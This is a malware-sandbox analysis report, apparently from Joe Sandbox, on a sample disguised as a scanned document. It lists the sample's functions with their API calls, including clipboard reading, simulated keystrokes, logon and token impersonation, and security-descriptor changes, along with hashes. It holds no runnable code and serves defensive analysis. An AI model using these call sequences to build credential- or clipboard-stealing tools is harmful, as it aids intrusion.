Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 17ee89632196b7223a4edca7fc99709e36c70554f19d7a0583fa6f8057c42bc6
Instruction ID: 84712a34e3ce55a7a8374c4f7c9f6b6c70b338728bdca09a1dee2686e2f53636
Opcode Fuzzy Hash: 17ee89632196b7223a4edca7fc99709e36c70554f19d7a0583fa6f8057c42bc6
Instruction Fuzzy Hash: 6C817C306087019FC714EF28C491AA9B7F5FF99314F14452DF89A9B2A2DB30ED85CB92

Function 00816246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,008524E0), ref: 00816266

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c087e0e6d581dd082dad97ea675f7662adb16cd1d2209b23070f1631db00cdbd
Instruction ID: d818e3c41aea2912c71aa63b8c10af9f9ece3f8ce596c62e6c32dd4271e4e62b
Opcode Fuzzy Hash: c087e0e6d581dd082dad97ea675f7662adb16cd1d2209b23070f1631db00cdbd
Instruction Fuzzy Hash: 90E0BD75800B01DFD7318F1AE804492FBF9FFE13613208A2ED0E692660E7B0689ACF50

Function 01073B18 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01073B29

Memory Dump Source

Source File: 00000000.00000002.1461712896.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1071000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 3ab9e7e9f10c78b9f605eb4d563f7b4b111a99908139687aac9fa4422cfa4b60
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 28E0E67494010DDFDB00DFB4D5496EDBBB4FF04701F100161FD01D2281D6309D609A66

Non-executed Functions

Function 008A9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008A961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008A965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 008A969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008A96C9
SendMessageW.USER32 ref: 008A96F2
GetKeyState.USER32(00000011), ref: 008A978B
GetKeyState.USER32(00000009), ref: 008A9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008A97AE
GetKeyState.USER32(00000010), ref: 008A97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008A97E9
SendMessageW.USER32 ref: 008A9810
SendMessageW.USER32(?,00001030,?,008A7E95), ref: 008A9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008A992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008A9941
SetCapture.USER32(?), ref: 008A994A
ClientToScreen.USER32(?,?), ref: 008A99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008A99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008A99D6
ReleaseCapture.USER32 ref: 008A99E1
GetCursorPos.USER32(?), ref: 008A9A19
ScreenToClient.USER32(?,?), ref: 008A9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 008A9A80
SendMessageW.USER32 ref: 008A9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 008A9AEB
SendMessageW.USER32 ref: 008A9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008A9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 008A9B4A
GetCursorPos.USER32(?), ref: 008A9B68
ScreenToClient.USER32(?,?), ref: 008A9B75
GetParent.USER32(?), ref: 008A9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 008A9BFA
SendMessageW.USER32 ref: 008A9C2B
ClientToScreen.USER32(?,?), ref: 008A9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008A9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 008A9CDE
SendMessageW.USER32 ref: 008A9D01
ClientToScreen.USER32(?,?), ref: 008A9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008A9D82

Part of subcall function 00829944: GetWindowLongW.USER32(?,000000EB), ref: 00829952

GetWindowLongW.USER32(?,000000F0), ref: 008A9E05

Strings

F, xrefs: 008A9D07
@GUI_DRAGID, xrefs: 008A997D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 4dfaab4b8101e45aa60a7e1ab36309d2f32c640bf9d25f7ea177f018534def83
Instruction ID: 430649a502f0b29e1ab9254312345104bff9884b75d4cc7afbe856634beeb5b0
Opcode Fuzzy Hash: 4dfaab4b8101e45aa60a7e1ab36309d2f32c640bf9d25f7ea177f018534def83
Instruction Fuzzy Hash: 4B428034608241AFEB24CF68CC84AAABBE5FF5A314F14051DF695C7AA1D771E850CF51

Function 008A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008A48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 008A4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 008A4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 008A494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 008A495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 008A497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008A49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008A49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 008A4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008A4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008A4A7E
IsMenu.USER32(?), ref: 008A4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A4B20
GetWindowLongW.USER32(?,000000F0), ref: 008A4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 008A4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 008A4C82
wsprintfW.USER32 ref: 008A4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008A4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 008A4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008A4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008A4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 008A4D5A

Strings

%d/%02d/%02d, xrefs: 008A4CA8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 198b6f946696b647bf0aa66414c1402c1da4c4bb0595ced24448f17e0d11dd74
Instruction ID: c69cd272b3f94ee06a02a7452982dd2c03e07ef2f1cdd81b08f44c9dbfb3dbcc
Opcode Fuzzy Hash: 198b6f946696b647bf0aa66414c1402c1da4c4bb0595ced24448f17e0d11dd74
Instruction Fuzzy Hash: BB12DC71600218ABFF258F28DC49FAE7BF8FF86314F105129F516EA6A1DBB49941CB50

Function 0082F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0082F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086F474
IsIconic.USER32(00000000), ref: 0086F47D
ShowWindow.USER32(00000000,00000009), ref: 0086F48A
SetForegroundWindow.USER32(00000000), ref: 0086F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F4AA
GetCurrentThreadId.KERNEL32 ref: 0086F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0086F4DE
SetForegroundWindow.USER32(00000000), ref: 0086F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F4F6
keybd_event.USER32(00000012,00000000), ref: 0086F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F50B
keybd_event.USER32(00000012,00000000), ref: 0086F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F519
keybd_event.USER32(00000012,00000000), ref: 0086F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F528
keybd_event.USER32(00000012,00000000), ref: 0086F52D
SetForegroundWindow.USER32(00000000), ref: 0086F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0086F557

Strings

Shell_TrayWnd, xrefs: 0086F46F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c43e5eba7bb8bbcb483dfec13e3bccce5a3bfdf53653402f16b03b691b518a63
Instruction ID: bbba0c5f667ea7f8af060f3decbadbff585188750c6d6a9de9f4381c163a062e
Opcode Fuzzy Hash: c43e5eba7bb8bbcb483dfec13e3bccce5a3bfdf53653402f16b03b691b518a63
Instruction Fuzzy Hash: 39311071A40218BFFB216BB55C4AFBF7E6CFB45B50F110065FB01E61D1DAB19D00AA60

Function 00871201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 008716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087170D
Part of subcall function 008716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087173A
Part of subcall function 008716C3: GetLastError.KERNEL32 ref: 0087174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00871286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008712A8
CloseHandle.KERNEL32(?), ref: 008712B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008712D1
GetProcessWindowStation.USER32 ref: 008712EA
SetProcessWindowStation.USER32(00000000), ref: 008712F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00871310

Part of subcall function 008710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008711FC), ref: 008710D4
Part of subcall function 008710BF: CloseHandle.KERNEL32(?,?,008711FC), ref: 008710E9

Strings

, xrefs: 0087125A
winsta0, xrefs: 008712CC
default, xrefs: 0087130B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 1378f3101fab52a6cf702cbe04c6663c92fd9370a81033b5d5608bfcfcaecef7
Instruction ID: fcda87ccc518b7deea5e1c8b655cf97664884e83f2236db6e13b48e44acd96d3
Opcode Fuzzy Hash: 1378f3101fab52a6cf702cbe04c6663c92fd9370a81033b5d5608bfcfcaecef7
Instruction Fuzzy Hash: 42819D71900208AFEF219FA8DC49BEE7BBAFF05704F148129F914E66A4D774C944CB65

Function 00870B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00871114
Part of subcall function 008710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871120
Part of subcall function 008710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 0087112F
Part of subcall function 008710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871136
Part of subcall function 008710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0087114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00870BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00870C00
GetLengthSid.ADVAPI32(?), ref: 00870C17
GetAce.ADVAPI32(?,00000000,?), ref: 00870C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00870C6D
GetLengthSid.ADVAPI32(?), ref: 00870C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00870C8C
HeapAlloc.KERNEL32(00000000), ref: 00870C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00870CB4
CopySid.ADVAPI32(00000000), ref: 00870CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00870CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00870D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00870D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870D45
HeapFree.KERNEL32(00000000), ref: 00870D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870D55
HeapFree.KERNEL32(00000000), ref: 00870D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870D65
HeapFree.KERNEL32(00000000), ref: 00870D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00870D78
HeapFree.KERNEL32(00000000), ref: 00870D7F

Part of subcall function 00871193: GetProcessHeap.KERNEL32(00000008,00870BB1,?,00000000,?,00870BB1,?), ref: 008711A1
Part of subcall function 00871193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00870BB1,?), ref: 008711A8
Part of subcall function 00871193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00870BB1,?), ref: 008711B7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 45878661e8de86a8c88a90153f60b12486fc92120f7f742692ab7d5295d99260
Instruction ID: f04aa307d036dc1ea4e2f0ad3ba18c60c1f70765eab9db2d73ac6bf8261845d2
Opcode Fuzzy Hash: 45878661e8de86a8c88a90153f60b12486fc92120f7f742692ab7d5295d99260
Instruction Fuzzy Hash: 4B713C71A0020AEBEF10DFA4DC48BAEBBB8FF05310F148615E919E6295D775E905CF60

Function 0088EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(008ACC08), ref: 0088EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0088EB37
GetClipboardData.USER32(0000000D), ref: 0088EB43
CloseClipboard.USER32 ref: 0088EB4F
GlobalLock.KERNEL32(00000000), ref: 0088EB87
CloseClipboard.USER32 ref: 0088EB91
GlobalUnlock.KERNEL32(00000000), ref: 0088EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0088EBC9
GetClipboardData.USER32(00000001), ref: 0088EBD1
GlobalLock.KERNEL32(00000000), ref: 0088EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0088EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0088EC38
GetClipboardData.USER32(0000000F), ref: 0088EC44
GlobalLock.KERNEL32(00000000), ref: 0088EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0088EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0088EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0088ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0088ECF3
CountClipboardFormats.USER32 ref: 0088ED14
CloseClipboard.USER32 ref: 0088ED59

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 527503877cae71db8263cf0b58aa055d114de37d4355ba7c85f1f718c32c62f1
Instruction ID: 633a7cf0669e7108942ce50a8ff17b37dc466ab25bdbd8524c71ce7e867e3be0
Opcode Fuzzy Hash: 527503877cae71db8263cf0b58aa055d114de37d4355ba7c85f1f718c32c62f1
Instruction Fuzzy Hash: 2061BD342042059FE310EF28D894F6ABBA8FF85714F18451DF496D76A2DB31ED49CBA2

Function 0088698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008869BE
FindClose.KERNEL32(00000000), ref: 00886A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00886A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00886A75

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00886AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00886ADF

Strings

%4d, xrefs: 00886BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00886B32
%03d, xrefs: 00886DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00886B6A
%02d, xrefs: 00886C00, 00886C0A, 00886C5A, 00886CAA, 00886CFA, 00886D4A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: cf52c05cae511dfb5c89627ca2b10f10ef2965edde4114305ef70ecf70a38568
Instruction ID: 6d44530155ac059c145f82fe8597139afeab526d3e926450768e5ef87e6d4f5e
Opcode Fuzzy Hash: cf52c05cae511dfb5c89627ca2b10f10ef2965edde4114305ef70ecf70a38568
Instruction Fuzzy Hash: 06D12C72508300AAC714EBA8D891EABB7ECFF88704F44491EF585D7291EB74DA44CB63

Function 00889642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00889663
GetFileAttributesW.KERNEL32(?), ref: 008896A1
SetFileAttributesW.KERNEL32(?,?), ref: 008896BB
FindNextFileW.KERNEL32(00000000,?), ref: 008896D3
FindClose.KERNEL32(00000000), ref: 008896DE
FindFirstFileW.KERNEL32(*.*,?), ref: 008896FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0088974A
SetCurrentDirectoryW.KERNEL32(008D6B7C), ref: 00889768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00889772
FindClose.KERNEL32(00000000), ref: 0088977F
FindClose.KERNEL32(00000000), ref: 0088978F

Strings

*.*, xrefs: 008896F5

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e81c4f1c5a21108f7ba14b21a741e3574d5e5cefa170ce81816fa471f7bcca4b
Instruction ID: 7a6813a68ac68ac39c4800058b60ea3f36b32e74ab9a25e210a598cb9248e469
Opcode Fuzzy Hash: e81c4f1c5a21108f7ba14b21a741e3574d5e5cefa170ce81816fa471f7bcca4b
Instruction Fuzzy Hash: 6331C0325412196AEF20FFB4DC08AEE77ACFF4A320F184156F855E22A0EB74DE408B54

Function 0088979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 008897BE
FindNextFileW.KERNEL32(00000000,?), ref: 00889819
FindClose.KERNEL32(00000000), ref: 00889824
FindFirstFileW.KERNEL32(*.*,?), ref: 00889840
SetCurrentDirectoryW.KERNEL32(?), ref: 00889890
SetCurrentDirectoryW.KERNEL32(008D6B7C), ref: 008898AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 008898B8
FindClose.KERNEL32(00000000), ref: 008898C5
FindClose.KERNEL32(00000000), ref: 008898D5

Part of subcall function 0087DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0087DB00

Strings

*.*, xrefs: 0088983B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: b950f0f06f11aabe836724549331d907aacce1ba4713af246605aa39aef6f8ef
Instruction ID: 1421da529393fbbd0d4d7643d9c05ea0bba676cb1f48f1c7ec1583597b05a411
Opcode Fuzzy Hash: b950f0f06f11aabe836724549331d907aacce1ba4713af246605aa39aef6f8ef
Instruction Fuzzy Hash: 9831A33150061E6EEF10BFB4DC48AEE77ACFF46324F184166E894E2691EB75DE448B60

Function 00888195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00888257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00888267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00888273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00888310
SetCurrentDirectoryW.KERNEL32(?), ref: 00888324
SetCurrentDirectoryW.KERNEL32(?), ref: 00888356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0088838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00888395

Strings

*.*, xrefs: 0088839B

Memory Dump Source

